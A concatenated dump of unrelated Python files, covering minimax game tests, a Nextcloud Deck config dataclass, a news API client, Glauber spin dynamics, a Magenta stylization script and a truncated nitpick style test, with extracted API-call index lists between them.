[((2064, 2149), 'google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file', 'InstalledAppFlow.from_client_secrets_file', (['self.client_secrets_file', 'self.scopes'], {}), '(self.client_secrets_file, self.scopes\n )\n', (2105, 2149), False, 'from google_auth_oauthlib.flow import InstalledAppFlow\n'), ((3929, 4005), 'googleapiclient.discovery.build', 'build', (['self.api_service_name', 'self.api_version'], {'credentials': 'self.credentials'}), '(self.api_service_name, self.api_version, credentials=self.credentials)\n', (3934, 4005), False, 'from googleapiclient.discovery import build\n'), ((3031, 3063), 'pickle.dump', 'pickle.dump', (['self.credentials', 'f'], {}), '(self.credentials, f)\n', (3042, 3063), False, 'import pickle\n'), ((3290, 3342), 'os.rename', 'os.rename', (['self.client_secrets_file', 'new_destination'], {}), '(self.client_secrets_file, new_destination)\n', (3299, 3342), False, 'import os\n'), ((3817, 3831), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (3828, 3831), False, 'import pickle\n'), ((2711, 2755), 'pathlib.Path', 'Path', (['f"""{FOLDER_CHANNELS}/{self.channel_id}"""'], {}), "(f'{FOLDER_CHANNELS}/{self.channel_id}')\n", (2715, 2755), False, 'from pathlib import Path\n'), ((3445, 3496), 'shutil.copyfile', 'copyfile', (['self.client_secrets_file', 'new_destination'], {}), '(self.client_secrets_file, new_destination)\n', (3453, 3496), False, 'from shutil import copyfile\n')]
|
"""
Tests for Minimax algorithm
"""
import math
from pyai.search.minimax import (
minimax,
init_game,
to_string,
)
def setup_game():
"""Set up a game for tests."""
red_discs = {
(0, 1),
(1, 0),
(1, 1),
(1, 3),
(2, 3),
(3, 0),
(3, 1),
(3, 2),
(3, 4),
(4, 2),
(4, 3),
(5, 0),
(5, 4),
}
yellow_discs = {
(0, 0),
(0, 2),
(0, 3),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
(3, 3),
(4, 0),
(4, 1),
(4, 4),
(5, 1),
(5, 2),
(5, 3),
}
return init_game(
n_rows=6, n_columns=7, red_discs=red_discs, yellow_discs=yellow_discs
)
def test_minimax():
"""Test Minimax without alpha-beta pruning"""
game = setup_game()
print("Starting position:")
print(to_string(game))
# Search for best move for red player (maximizer), looking 2 plays ahead
# Alpha-beta pruning is disabled
score, next_position, total_evaluated_positions, _, _ = minimax(
game, 2, True, None, None
)
# Best move for red is at (5,5) to prevent a win for yellow
assert score == -2
assert next_position[5][5] == "R"
# No pruning: all valid positions are evaluated
assert total_evaluated_positions == 9
print(f"Best score: {score} ({total_evaluated_positions} evaluated position(s))")
print("Next position:")
print(to_string(next_position))
def test_minimax_alphabeta():
"""Test Minimax with alpha-beta pruning"""
game = setup_game()
print("Starting position:")
print(to_string(game))
# Search for best move for red player (maximizer), looking 2 plays ahead
# Alpha-beta pruning is enabled
score, next_position, total_evaluated_positions, _, _ = minimax(
game,
2,
True,
-math.inf, # Init alpha and beta with worst possible values
math.inf,
)
# Best move for red is at (5,5) to prevent a win for yellow
assert score == -2
assert next_position[5][5] == "R"
# The last position (in left to right order) should not be evaluated
assert total_evaluated_positions == 8
print(f"Best score: {score} ({total_evaluated_positions} evaluated position(s))")
print("Next position:")
print(to_string(next_position))
def test_minimax_win():
"""Test Minimax with a winning solution"""
game = setup_game()
print("Starting position:")
print(to_string(game))
# Search for best move for yellow player (minimizer), looking 2 plays ahead
# Alpha-beta pruning is enabled
score, next_position, total_evaluated_positions, _, _ = minimax(
game,
2,
False,
-math.inf, # Init alpha and beta with worst possible values
math.inf,
)
# Best move for yellow is at (5,5) which is a win
assert score == -100
assert next_position[5][5] == "Y"
# One yellow move is a direct win, so 3 less positions are evaluated
# No pruning this time
assert total_evaluated_positions == 7
print(f"Best score: {score} ({total_evaluated_positions} evaluated position(s))")
print("Next position:")
print(to_string(next_position))
|
[
"pyai.search.minimax.minimax",
"pyai.search.minimax.init_game",
"pyai.search.minimax.to_string"
] |
[((679, 764), 'pyai.search.minimax.init_game', 'init_game', ([], {'n_rows': '(6)', 'n_columns': '(7)', 'red_discs': 'red_discs', 'yellow_discs': 'yellow_discs'}), '(n_rows=6, n_columns=7, red_discs=red_discs, yellow_discs=yellow_discs\n )\n', (688, 764), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1105, 1139), 'pyai.search.minimax.minimax', 'minimax', (['game', '(2)', '(True)', 'None', 'None'], {}), '(game, 2, True, None, None)\n', (1112, 1139), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1861, 1904), 'pyai.search.minimax.minimax', 'minimax', (['game', '(2)', '(True)', '(-math.inf)', 'math.inf'], {}), '(game, 2, True, -math.inf, math.inf)\n', (1868, 1904), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((2727, 2771), 'pyai.search.minimax.minimax', 'minimax', (['game', '(2)', '(False)', '(-math.inf)', 'math.inf'], {}), '(game, 2, False, -math.inf, math.inf)\n', (2734, 2771), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((913, 928), 'pyai.search.minimax.to_string', 'to_string', (['game'], {}), '(game)\n', (922, 928), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1498, 1522), 'pyai.search.minimax.to_string', 'to_string', (['next_position'], {}), '(next_position)\n', (1507, 1522), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1670, 1685), 'pyai.search.minimax.to_string', 'to_string', (['game'], {}), '(game)\n', (1679, 1685), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((2367, 2391), 'pyai.search.minimax.to_string', 'to_string', (['next_position'], {}), '(next_position)\n', (2376, 2391), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((2533, 2548), 'pyai.search.minimax.to_string', 'to_string', (['game'], {}), '(game)\n', (2542, 2548), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((3253, 3277), 'pyai.search.minimax.to_string', 'to_string', (['next_position'], {}), '(next_position)\n', (3262, 3277), False, 'from pyai.search.minimax import minimax, init_game, to_string\n')]
|
"""
Module handles all the configuration stuff.
"""
from dataclasses import dataclass, field
from typing import List, ClassVar, Type
from marshmallow import Schema
import marshmallow_dataclass
import yaml
@dataclass
class Config:
"""Config describes the configuration-file for the CLI application."""
url: str = field(
metadata=dict(
description="Nextcloud URL",
default="nc.example.com")
)
user: str = field(
metadata=dict(
description="Nextcloud user",
default="usr")
)
password: str = field(
metadata=dict(
description="Nextcloud password",
default="<PASSWORD>")
)
ignore_board: List[str] = field(
metadata=dict(
description="Name of boards to be ignored",
default=["Personal"])
)
backlog_stacks: List[str] = field(
metadata=dict(
description="Name of stacks considered to be a backlog",
default=["Backlog"])
)
progress_stacks: List[str] = field(
metadata=dict(
description="Stacks containing tasks in the progress",
default=["In Progress"])
)
done_stacks: List[str] = field(
metadata=dict(
description="Stacks containing done tasks",
default=["Done"])
)
# mail_cache_path: str = field(
# metadata=dict(
# description="Path to mail-address cache",
# default="deck-cache.yaml",
# )
# )
timezone: str = field(
metadata=dict(
description="Timezone",
default="Europe/Berlin",
)
)
Schema: ClassVar[Type[Schema]] = Schema
@classmethod
def from_yaml(cls, raw: str) -> 'Config':
"""Loads the configuration from a given YAML string."""
schema = marshmallow_dataclass.class_schema(Config)()
data = yaml.load(raw, Loader=yaml.FullLoader)
return schema.load(data)
@classmethod
def defaults(cls) -> 'Config':
"""Returns a new instance of the Config with the default values."""
return Config(
url="nc.example.com",
user="usr",
password="<PASSWORD>",
ignore_board=["Personal"],
backlog_stacks=["Backlog"],
progress_stacks=["In Progress"],
done_stacks=["Done"],
# mail_cache_path="check-cache.yaml",
timezone="Europe/Berlin",
)
def to_yaml(self) -> str:
"""Returns the config data-class as a YAML string."""
schema = marshmallow_dataclass.class_schema(Config)()
cfg = schema.dump(self)
return yaml.dump(cfg)
|
[
"marshmallow_dataclass.class_schema",
"yaml.load",
"yaml.dump"
] |
[((1903, 1941), 'yaml.load', 'yaml.load', (['raw'], {'Loader': 'yaml.FullLoader'}), '(raw, Loader=yaml.FullLoader)\n', (1912, 1941), False, 'import yaml\n'), ((2678, 2692), 'yaml.dump', 'yaml.dump', (['cfg'], {}), '(cfg)\n', (2687, 2692), False, 'import yaml\n'), ((1843, 1885), 'marshmallow_dataclass.class_schema', 'marshmallow_dataclass.class_schema', (['Config'], {}), '(Config)\n', (1877, 1885), False, 'import marshmallow_dataclass\n'), ((2586, 2628), 'marshmallow_dataclass.class_schema', 'marshmallow_dataclass.class_schema', (['Config'], {}), '(Config)\n', (2620, 2628), False, 'import marshmallow_dataclass\n')]
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
This script assembles a standalone LaTeX file with bibliography and list of
figures incorporated into the main document (JASA requires single standalone
documents for article submission). It also replaces proper unicode en-dashes
(–) with LaTeX-style double-hyphens (--) and smart double quotes with LaTeX-
style `` and ''. Pandoc has already done this in the main document (which
propogates to the list of figures), so we only modify the bibliography here.
'''
import sys
import os.path as op
infile = sys.argv[-2]
outfile = sys.argv[-1]
bibliography = op.splitext(infile)[0] + '.bbl'
listoffigs = op.splitext(infile)[0] + '.lof'
figs = ''.join(open(listoffigs).readlines())
bib = ''.join(open(bibliography).readlines())
bib = bib.replace('–', '--')
bib = bib.replace('“', '``')
bib = bib.replace('”', '\'\'')
with open(infile, 'r') as f, open(outfile, 'w') as g:
for line in f:
if '\\bibliography{' in line:
line = bib
if '\\listoffigures' in line:
g.write('\\section*{List of figures}\n')
line = figs
g.write(line)
|
[
"os.path.splitext"
] |
[((606, 625), 'os.path.splitext', 'op.splitext', (['infile'], {}), '(infile)\n', (617, 625), True, 'import os.path as op\n'), ((651, 670), 'os.path.splitext', 'op.splitext', (['infile'], {}), '(infile)\n', (662, 670), True, 'import os.path as op\n')]
|
import urllib.request,json
from .models import Article, Source
# Getting api key
api_key = None
# Getting the base and sources url
base_url = None
sources_url = None
def configure_request(app):
global api_key,base_url,sources_url
api_key = app.config['NEWS_API_KEY']
base_url = app.config['NEWS_API_BASE_URL']
sources_url = app.config['NEWS_API_SOURCES_URL']
def get_news(article,q,e):
'''
Function that gets the json response to our url request
'''
get_news_url = base_url.format(article,q,e,api_key)
with urllib.request.urlopen(get_news_url) as url:
get_news_data = url.read()
get_news_response = json.loads(get_news_data)
news_results = None #replacable with []
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_articles(news_results_list)
return news_results
def get_sources(category):
'''
Function that gets the json response to our url request
'''
get_sources_url = sources_url.format(category,api_key)
with urllib.request.urlopen(get_sources_url) as url:
get_sources_data = url.read()
get_sources_response = json.loads(get_sources_data)
sources_results = None #replacable with []
if get_sources_response['sources']:
sources_results_list = get_sources_response['sources']
sources_results = process_sources(sources_results_list)
return sources_results
def process_articles(news_list): #articles_url
'''
Function that processes the news result and transform them to a list of Objects
Args:
news_list: A list of dictionaries that contain news details
Returns :
news_results: A list of news objects
'''
news_results = []
for news_item in news_list:
title = news_item.get('title')
author = news_item.get('author')
description = news_item.get('description')
url = news_item.get('url')
poster = news_item.get('urlToImage')
publishedAt = news_item.get('publishedAt')
content = news_item.get('content')
if poster:
news_object = Article(title,author,description,url,poster,publishedAt,content)
news_results.append(news_object)
return news_results
def process_sources(sources_list): #sources_url
'''
Function that processes the news result and transform them to a list of Objects
Args:
news_list: A list of dictionaries that contain sources details
Returns :
news_results: A list of sorces objects
'''
sources_results = []
for source_item in sources_list:
id = source_item.get('id')
name = source_item.get('name')
description = source_item.get('description')
url = source_item.get('url')
category = source_item.get('category')
country = source_item.get('country')
source_object = Source(id,name,description,url,category,country)
sources_results.append(source_object)
return sources_results
|
[
"json.loads"
] |
[((657, 682), 'json.loads', 'json.loads', (['get_news_data'], {}), '(get_news_data)\n', (667, 682), False, 'import urllib.request, json\n'), ((1218, 1246), 'json.loads', 'json.loads', (['get_sources_data'], {}), '(get_sources_data)\n', (1228, 1246), False, 'import urllib.request, json\n')]
|
import numpy as np
from random import random
from noneq_settings import BETA
def hamming(s1, s2):
"""Calculate the Hamming distance between two bit lists"""
assert len(s1) == len(s2)
return sum(c1 != c2 for c1, c2 in zip(s1, s2))
def hamiltonian(state_vec, intxn_matrix):
return -0.5 * reduce(np.dot, [state_vec.T, intxn_matrix, state_vec]) # plus some other field terms... do we care for these? ie. "-sum h_i*s_i"
def internal_field(state, spin_idx, t, intxn_matrix):
internal_field = np.dot(intxn_matrix[spin_idx,:], state[:,t])
return internal_field
def glauber_dynamics_update(state, spin_idx, t, intxn_matrix, app_field=None, beta=BETA):
r1 = random()
total_field = internal_field(state, spin_idx, t, intxn_matrix)
if app_field is not None:
total_field += app_field[spin_idx]
prob_on_after_timestep = 1 / (1 + np.exp(-2*beta*total_field)) # probability that site i will be "up" after the timestep
#prob_on_after_timestep = 1 / (1 + np.exp(-BETA*total_field)) # (note remove factor of 2 because h = 0.5*J*s) probability that site i will be "up" after the timestep
if prob_on_after_timestep > r1:
#state[spin_idx, t + 1] = 1.0
state[spin_idx, t] = 1.0
else:
#state[spin_idx, t + 1] = -1.0
state[spin_idx, t] = -1.0
return state
def state_to_label(state):
# Idea: assign integer label (0 to 2^N - 1) to the state
# state acts like binary representation of integers
# "0" corresponds to all -1
# 2^N - 1 corresponds to all +1
label = 0
bitlist = (1+np.array(state, dtype=int))/2
for bit in bitlist:
label = (label << 1) | bit
return label
def label_to_state(label, N, use_neg=True):
# n is the integer label of a set of spins
bitlist = [1 if digit=='1' else 0 for digit in bin(label)[2:]]
if len(bitlist) < N:
tmp = bitlist
bitlist = np.zeros(N, dtype=int)
bitlist[-len(tmp):] = tmp[:]
if use_neg:
state = np.array(bitlist)*2 - 1
else:
state = np.array(bitlist)
return state
def get_adjacent_labels(state):
# TODO slow, how to speedup with permutation?
N = len(state)
labels = [0] * N
tmp = np.zeros(N, dtype=int)
for i in xrange(N):
tmp[:] = state[:]
tmp[i] = -1 * state[i]
labels[i] = state_to_label(tmp)
return labels
|
[
"numpy.zeros",
"random.random",
"numpy.array",
"numpy.exp",
"numpy.dot"
] |
[((514, 560), 'numpy.dot', 'np.dot', (['intxn_matrix[spin_idx, :]', 'state[:, t]'], {}), '(intxn_matrix[spin_idx, :], state[:, t])\n', (520, 560), True, 'import numpy as np\n'), ((686, 694), 'random.random', 'random', ([], {}), '()\n', (692, 694), False, 'from random import random\n'), ((2226, 2248), 'numpy.zeros', 'np.zeros', (['N'], {'dtype': 'int'}), '(N, dtype=int)\n', (2234, 2248), True, 'import numpy as np\n'), ((1915, 1937), 'numpy.zeros', 'np.zeros', (['N'], {'dtype': 'int'}), '(N, dtype=int)\n', (1923, 1937), True, 'import numpy as np\n'), ((2057, 2074), 'numpy.array', 'np.array', (['bitlist'], {}), '(bitlist)\n', (2065, 2074), True, 'import numpy as np\n'), ((873, 904), 'numpy.exp', 'np.exp', (['(-2 * beta * total_field)'], {}), '(-2 * beta * total_field)\n', (879, 904), True, 'import numpy as np\n'), ((1584, 1610), 'numpy.array', 'np.array', (['state'], {'dtype': 'int'}), '(state, dtype=int)\n', (1592, 1610), True, 'import numpy as np\n'), ((2007, 2024), 'numpy.array', 'np.array', (['bitlist'], {}), '(bitlist)\n', (2015, 2024), True, 'import numpy as np\n')]
|
# Copyright 2020 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates stylized images with different strengths of a stylization.
For each pair of the content and style images this script computes stylized
images with different strengths of stylization (interpolates between the
identity transform parameters and the style parameters for the style image) and
saves them to the given output_dir.
See run_interpolation_with_identity.sh for example usage.
"""
import ast
import os
from magenta.models.arbitrary_image_stylization import arbitrary_image_stylization_build_model as build_model
from magenta.models.image_stylization import image_utils
import numpy as np
import tensorflow.compat.v1 as tf
import tf_slim as slim
flags = tf.flags
flags.DEFINE_string('checkpoint', None, 'Path to the model checkpoint.')
flags.DEFINE_string('style_images_paths', None, 'Paths to the style images'
'for evaluation.')
flags.DEFINE_string('content_images_paths', None, 'Paths to the content images'
'for evaluation.')
flags.DEFINE_string('output_dir', None, 'Output directory.')
flags.DEFINE_integer('image_size', 256, 'Image size.')
flags.DEFINE_boolean('content_square_crop', False, 'Whether to center crop'
'the content image to be a square or not.')
flags.DEFINE_integer('style_image_size', 256, 'Style image size.')
flags.DEFINE_boolean('style_square_crop', False, 'Whether to center crop'
'the style image to be a square or not.')
flags.DEFINE_integer('maximum_styles_to_evaluate', 1024, 'Maximum number of'
'styles to evaluate.')
flags.DEFINE_string('interpolation_weights', '[1.0]', 'List of weights'
'for interpolation between the parameters of the identity'
'transform and the style parameters of the style image. The'
'larger the weight is the strength of stylization is more.'
'Weight of 1.0 means the normal style transfer and weight'
'of 0.0 means identity transform.')
FLAGS = flags.FLAGS
def main(unused_argv=None):
tf.logging.set_verbosity(tf.logging.INFO)
if not tf.gfile.Exists(FLAGS.output_dir):
tf.gfile.MkDir(FLAGS.output_dir)
with tf.Graph().as_default(), tf.Session() as sess:
# Defines place holder for the style image.
style_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
if FLAGS.style_square_crop:
style_img_preprocessed = image_utils.center_crop_resize_image(
style_img_ph, FLAGS.style_image_size)
else:
style_img_preprocessed = image_utils.resize_image(style_img_ph,
FLAGS.style_image_size)
# Defines place holder for the content image.
content_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
if FLAGS.content_square_crop:
content_img_preprocessed = image_utils.center_crop_resize_image(
content_img_ph, FLAGS.image_size)
else:
content_img_preprocessed = image_utils.resize_image(
content_img_ph, FLAGS.image_size)
# Defines the model.
stylized_images, _, _, bottleneck_feat = build_model.build_model(
content_img_preprocessed,
style_img_preprocessed,
trainable=False,
is_training=False,
inception_end_point='Mixed_6e',
style_prediction_bottleneck=100,
adds_losses=False)
if tf.gfile.IsDirectory(FLAGS.checkpoint):
checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint)
else:
checkpoint = FLAGS.checkpoint
tf.logging.info('loading latest checkpoint file: {}'.format(checkpoint))
init_fn = slim.assign_from_checkpoint_fn(checkpoint,
slim.get_variables_to_restore())
sess.run([tf.local_variables_initializer()])
init_fn(sess)
# Gets the list of the input style images.
style_img_list = tf.gfile.Glob(FLAGS.style_images_paths)
if len(style_img_list) > FLAGS.maximum_styles_to_evaluate:
np.random.seed(1234)
style_img_list = np.random.permutation(style_img_list)
style_img_list = style_img_list[:FLAGS.maximum_styles_to_evaluate]
# Gets list of input content images.
content_img_list = tf.gfile.Glob(FLAGS.content_images_paths)
for content_i, content_img_path in enumerate(content_img_list):
content_img_np = image_utils.load_np_image_uint8(content_img_path)[:, :, :
3]
content_img_name = os.path.basename(content_img_path)[:-4]
# Saves preprocessed content image.
inp_img_croped_resized_np = sess.run(
content_img_preprocessed, feed_dict={
content_img_ph: content_img_np
})
image_utils.save_np_image(inp_img_croped_resized_np,
os.path.join(FLAGS.output_dir,
'%s.jpg' % (content_img_name)))
# Computes bottleneck features of the style prediction network for the
# identity transform.
identity_params = sess.run(
bottleneck_feat, feed_dict={style_img_ph: content_img_np})
for style_i, style_img_path in enumerate(style_img_list):
if style_i > FLAGS.maximum_styles_to_evaluate:
break
style_img_name = os.path.basename(style_img_path)[:-4]
style_image_np = image_utils.load_np_image_uint8(style_img_path)[:, :, :
3]
if style_i % 10 == 0:
tf.logging.info('Stylizing (%d) %s with (%d) %s' %
(content_i, content_img_name, style_i,
style_img_name))
# Saves preprocessed style image.
style_img_croped_resized_np = sess.run(
style_img_preprocessed, feed_dict={
style_img_ph: style_image_np
})
image_utils.save_np_image(style_img_croped_resized_np,
os.path.join(FLAGS.output_dir,
'%s.jpg' % (style_img_name)))
# Computes bottleneck features of the style prediction network for the
# given style image.
style_params = sess.run(
bottleneck_feat, feed_dict={style_img_ph: style_image_np})
interpolation_weights = ast.literal_eval(FLAGS.interpolation_weights)
# Interpolates between the parameters of the identity transform and
# style parameters of the given style image.
for interp_i, wi in enumerate(interpolation_weights):
stylized_image_res = sess.run(
stylized_images,
feed_dict={
bottleneck_feat:
identity_params * (1 - wi) + style_params * wi,
content_img_ph:
content_img_np
})
# Saves stylized image.
image_utils.save_np_image(
stylized_image_res,
os.path.join(FLAGS.output_dir, '%s_stylized_%s_%d.jpg' %
(content_img_name, style_img_name, interp_i)))
def console_entry_point():
tf.disable_v2_behavior()
tf.app.run(main)
if __name__ == '__main__':
console_entry_point()
|
[
"numpy.random.seed",
"magenta.models.arbitrary_image_stylization.arbitrary_image_stylization_build_model.build_model",
"magenta.models.image_stylization.image_utils.load_np_image_uint8",
"tensorflow.compat.v1.gfile.Exists",
"magenta.models.image_stylization.image_utils.resize_image",
"tensorflow.compat.v1.gfile.Glob",
"os.path.join",
"tensorflow.compat.v1.app.run",
"tensorflow.compat.v1.placeholder",
"tensorflow.compat.v1.logging.info",
"tensorflow.compat.v1.Session",
"tensorflow.compat.v1.train.latest_checkpoint",
"os.path.basename",
"tf_slim.get_variables_to_restore",
"numpy.random.permutation",
"tensorflow.compat.v1.gfile.MkDir",
"magenta.models.image_stylization.image_utils.center_crop_resize_image",
"tensorflow.compat.v1.disable_v2_behavior",
"tensorflow.compat.v1.gfile.IsDirectory",
"tensorflow.compat.v1.local_variables_initializer",
"tensorflow.compat.v1.logging.set_verbosity",
"ast.literal_eval",
"tensorflow.compat.v1.Graph"
] |
[((2656, 2697), 'tensorflow.compat.v1.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (2680, 2697), True, 'import tensorflow.compat.v1 as tf\n'), ((7755, 7779), 'tensorflow.compat.v1.disable_v2_behavior', 'tf.disable_v2_behavior', ([], {}), '()\n', (7777, 7779), True, 'import tensorflow.compat.v1 as tf\n'), ((7782, 7798), 'tensorflow.compat.v1.app.run', 'tf.app.run', (['main'], {}), '(main)\n', (7792, 7798), True, 'import tensorflow.compat.v1 as tf\n'), ((2707, 2740), 'tensorflow.compat.v1.gfile.Exists', 'tf.gfile.Exists', (['FLAGS.output_dir'], {}), '(FLAGS.output_dir)\n', (2722, 2740), True, 'import tensorflow.compat.v1 as tf\n'), ((2746, 2778), 'tensorflow.compat.v1.gfile.MkDir', 'tf.gfile.MkDir', (['FLAGS.output_dir'], {}), '(FLAGS.output_dir)\n', (2760, 2778), True, 'import tensorflow.compat.v1 as tf\n'), ((2812, 2824), 'tensorflow.compat.v1.Session', 'tf.Session', ([], {}), '()\n', (2822, 2824), True, 'import tensorflow.compat.v1 as tf\n'), ((2901, 2950), 'tensorflow.compat.v1.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, None, 3]'}), '(tf.float32, shape=[None, None, 3])\n', (2915, 2950), True, 'import tensorflow.compat.v1 as tf\n'), ((3332, 3381), 'tensorflow.compat.v1.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, None, 3]'}), '(tf.float32, shape=[None, None, 3])\n', (3346, 3381), True, 'import tensorflow.compat.v1 as tf\n'), ((3715, 3916), 'magenta.models.arbitrary_image_stylization.arbitrary_image_stylization_build_model.build_model', 'build_model.build_model', (['content_img_preprocessed', 'style_img_preprocessed'], {'trainable': '(False)', 'is_training': '(False)', 'inception_end_point': '"""Mixed_6e"""', 'style_prediction_bottleneck': '(100)', 'adds_losses': '(False)'}), "(content_img_preprocessed, style_img_preprocessed,\n trainable=False, is_training=False, inception_end_point='Mixed_6e',\n style_prediction_bottleneck=100, adds_losses=False)\n", (3738, 3916), True, 'from magenta.models.arbitrary_image_stylization import arbitrary_image_stylization_build_model as build_model\n'), ((3974, 4012), 'tensorflow.compat.v1.gfile.IsDirectory', 'tf.gfile.IsDirectory', (['FLAGS.checkpoint'], {}), '(FLAGS.checkpoint)\n', (3994, 4012), True, 'import tensorflow.compat.v1 as tf\n'), ((4475, 4514), 'tensorflow.compat.v1.gfile.Glob', 'tf.gfile.Glob', (['FLAGS.style_images_paths'], {}), '(FLAGS.style_images_paths)\n', (4488, 4514), True, 'import tensorflow.compat.v1 as tf\n'), ((4804, 4845), 'tensorflow.compat.v1.gfile.Glob', 'tf.gfile.Glob', (['FLAGS.content_images_paths'], {}), '(FLAGS.content_images_paths)\n', (4817, 4845), True, 'import tensorflow.compat.v1 as tf\n'), ((3014, 3088), 'magenta.models.image_stylization.image_utils.center_crop_resize_image', 'image_utils.center_crop_resize_image', (['style_img_ph', 'FLAGS.style_image_size'], {}), '(style_img_ph, FLAGS.style_image_size)\n', (3050, 3088), False, 'from magenta.models.image_stylization import image_utils\n'), ((3141, 3203), 'magenta.models.image_stylization.image_utils.resize_image', 'image_utils.resize_image', (['style_img_ph', 'FLAGS.style_image_size'], {}), '(style_img_ph, FLAGS.style_image_size)\n', (3165, 3203), False, 'from magenta.models.image_stylization import image_utils\n'), ((3449, 3519), 'magenta.models.image_stylization.image_utils.center_crop_resize_image', 'image_utils.center_crop_resize_image', (['content_img_ph', 'FLAGS.image_size'], {}), '(content_img_ph, FLAGS.image_size)\n', (3485, 3519), False, 'from magenta.models.image_stylization import image_utils\n'), ((3574, 3632), 'magenta.models.image_stylization.image_utils.resize_image', 'image_utils.resize_image', (['content_img_ph', 'FLAGS.image_size'], {}), '(content_img_ph, FLAGS.image_size)\n', (3598, 3632), False, 'from magenta.models.image_stylization import image_utils\n'), ((4033, 4077), 'tensorflow.compat.v1.train.latest_checkpoint', 'tf.train.latest_checkpoint', (['FLAGS.checkpoint'], {}), '(FLAGS.checkpoint)\n', (4059, 4077), True, 'import tensorflow.compat.v1 as tf\n'), ((4306, 4337), 'tf_slim.get_variables_to_restore', 'slim.get_variables_to_restore', ([], {}), '()\n', (4335, 4337), True, 'import tf_slim as slim\n'), ((4584, 4604), 'numpy.random.seed', 'np.random.seed', (['(1234)'], {}), '(1234)\n', (4598, 4604), True, 'import numpy as np\n'), ((4628, 4665), 'numpy.random.permutation', 'np.random.permutation', (['style_img_list'], {}), '(style_img_list)\n', (4649, 4665), True, 'import numpy as np\n'), ((2787, 2797), 'tensorflow.compat.v1.Graph', 'tf.Graph', ([], {}), '()\n', (2795, 2797), True, 'import tensorflow.compat.v1 as tf\n'), ((4353, 4385), 'tensorflow.compat.v1.local_variables_initializer', 'tf.local_variables_initializer', ([], {}), '()\n', (4383, 4385), True, 'import tensorflow.compat.v1 as tf\n'), ((4938, 4987), 'magenta.models.image_stylization.image_utils.load_np_image_uint8', 'image_utils.load_np_image_uint8', (['content_img_path'], {}), '(content_img_path)\n', (4969, 4987), False, 'from magenta.models.image_stylization import image_utils\n'), ((5097, 5131), 'os.path.basename', 'os.path.basename', (['content_img_path'], {}), '(content_img_path)\n', (5113, 5131), False, 'import os\n'), ((5421, 5480), 'os.path.join', 'os.path.join', (['FLAGS.output_dir', "('%s.jpg' % content_img_name)"], {}), "(FLAGS.output_dir, '%s.jpg' % content_img_name)\n", (5433, 5480), False, 'import os\n'), ((6945, 6990), 'ast.literal_eval', 'ast.literal_eval', (['FLAGS.interpolation_weights'], {}), '(FLAGS.interpolation_weights)\n', (6961, 6990), False, 'import ast\n'), ((5899, 5931), 'os.path.basename', 'os.path.basename', (['style_img_path'], {}), '(style_img_path)\n', (5915, 5931), False, 'import os\n'), ((5962, 6009), 'magenta.models.image_stylization.image_utils.load_np_image_uint8', 'image_utils.load_np_image_uint8', (['style_img_path'], {}), '(style_img_path)\n', (5993, 6009), False, 'from magenta.models.image_stylization import image_utils\n'), ((6135, 6245), 'tensorflow.compat.v1.logging.info', 'tf.logging.info', (["('Stylizing (%d) %s with (%d) %s' % (content_i, content_img_name, style_i,\n style_img_name))"], {}), "('Stylizing (%d) %s with (%d) %s' % (content_i,\n content_img_name, style_i, style_img_name))\n", (6150, 6245), True, 'import tensorflow.compat.v1 as tf\n'), ((6591, 6648), 'os.path.join', 'os.path.join', (['FLAGS.output_dir', "('%s.jpg' % style_img_name)"], {}), "(FLAGS.output_dir, '%s.jpg' % style_img_name)\n", (6603, 6648), False, 'import os\n'), ((7593, 7699), 'os.path.join', 'os.path.join', (['FLAGS.output_dir', "('%s_stylized_%s_%d.jpg' % (content_img_name, style_img_name, interp_i))"], {}), "(FLAGS.output_dir, '%s_stylized_%s_%d.jpg' % (content_img_name,\n style_img_name, interp_i))\n", (7605, 7699), False, 'import os\n')]
|
"""Style tests."""
# pylint: disable=no-member
from textwrap import dedent
from typing import TYPE_CHECKING
from unittest import mock
from unittest.mock import PropertyMock
import pytest
import responses
from nitpick.constants import DOT_SLASH, PYPROJECT_TOML, READ_THE_DOCS_URL, SETUP_CFG, TOML_EXTENSION, TOX_INI
from nitpick.violations import Fuss
from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions
if TYPE_CHECKING:
from pathlib import Path
@pytest.mark.parametrize("offline", [False, True])
def test_multiple_styles_overriding_values(offline, tmp_path):
"""Test multiple style files with precedence (the latest ones overrides the previous ones)."""
ProjectMock(tmp_path).named_style(
"isort1",
f"""
["{SETUP_CFG}".isort]
line_length = 80
known_first_party = "tests"
xxx = "aaa"
""",
).named_style(
"styles/isort2",
f"""
["{SETUP_CFG}".isort]
line_length = 120
xxx = "yyy"
""",
).named_style(
"flake8",
f"""
["{SETUP_CFG}".flake8]
inline-quotes = "double"
something = 123
""",
).named_style(
"black",
"""
["pyproject.toml".tool.black]
line-length = 100
something = 11
""",
).pyproject_toml(
"""
[tool.nitpick]
style = ["isort1", "styles/isort2", "flake8.toml", "black"]
[tool.black]
something = 22
"""
).flake8(
offline=offline
).assert_errors_contain(
f"""
